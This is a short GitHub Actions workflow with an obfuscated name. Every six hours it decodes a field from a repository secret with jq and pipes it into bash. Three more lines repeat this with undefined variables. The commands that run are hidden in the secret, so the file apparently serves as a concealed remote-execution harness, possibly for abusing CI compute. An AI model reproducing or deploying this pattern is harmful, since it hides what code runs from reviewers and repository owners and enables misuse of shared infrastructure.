name: maturehometeam

on:
  workflow_dispatch:
  schedule:
    - cron: '54 0/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: maturehometeam
        env:
          f03: ${{ secrets.f03 }}
        run: |
          echo $f03 | jq -r .fzlh864 | /bin/bash
          echo $iqcvz85 | jq -r .li3862 | /bin/bash
          echo $h6 | jq -r .fgikf1695 | /bin/bash
          echo $iwvb894 | jq -r .srpyv93 | /bin/bash

